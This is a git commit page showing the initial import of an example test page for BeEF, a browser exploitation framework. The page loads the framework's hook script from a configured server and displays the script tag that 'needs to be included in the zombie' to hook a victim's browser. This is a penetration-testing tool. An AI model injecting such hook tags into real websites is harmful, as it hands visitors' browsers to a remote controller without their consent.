Initial Import
git-svn-id: https://beef.googlecode.com/svn/trunk@2 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
23
hook/example.php
Normal file
23
hook/example.php
Normal file
@@ -0,0 +1,23 @@
|
||||
<?
|
||||
require_once("../include/config.inc.php");
|
||||
?>
|
||||
<html>
|
||||
<head>
|
||||
<title>BeEF Test Page</title>
|
||||
<link rel="stylesheet" type="text/css" href="../css/firefox/style.css">
|
||||
<link rel="icon" href="favicon.ico" type="image/x-icon">
|
||||
</head>
|
||||
<body>
|
||||
<img src="../images/beef.gif" alt="BeEF"/>BeEF Test Page<br><br>
|
||||
|
||||
<script language='Javascript' src="<?=BEEF_DOMAIN?>hook/beefmagic.js.php"></script>
|
||||
|
||||
The following code needs to be included in the zombie:<br>
|
||||
<code>
|
||||
<script language='Javascript'
|
||||
src="<?=BEEF_DOMAIN?>hook/beefmagic.js.php'></script>
|
||||
</code>
|
||||
<br>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
Reference in New Issue
Block a user